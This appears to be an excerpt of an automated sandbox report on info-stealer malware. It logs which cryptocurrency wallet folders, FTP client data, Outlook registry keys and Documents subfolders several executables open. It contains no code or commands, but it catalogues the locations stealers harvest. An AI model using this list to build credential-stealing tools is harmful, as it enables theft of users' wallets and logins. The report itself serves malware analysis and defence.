Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
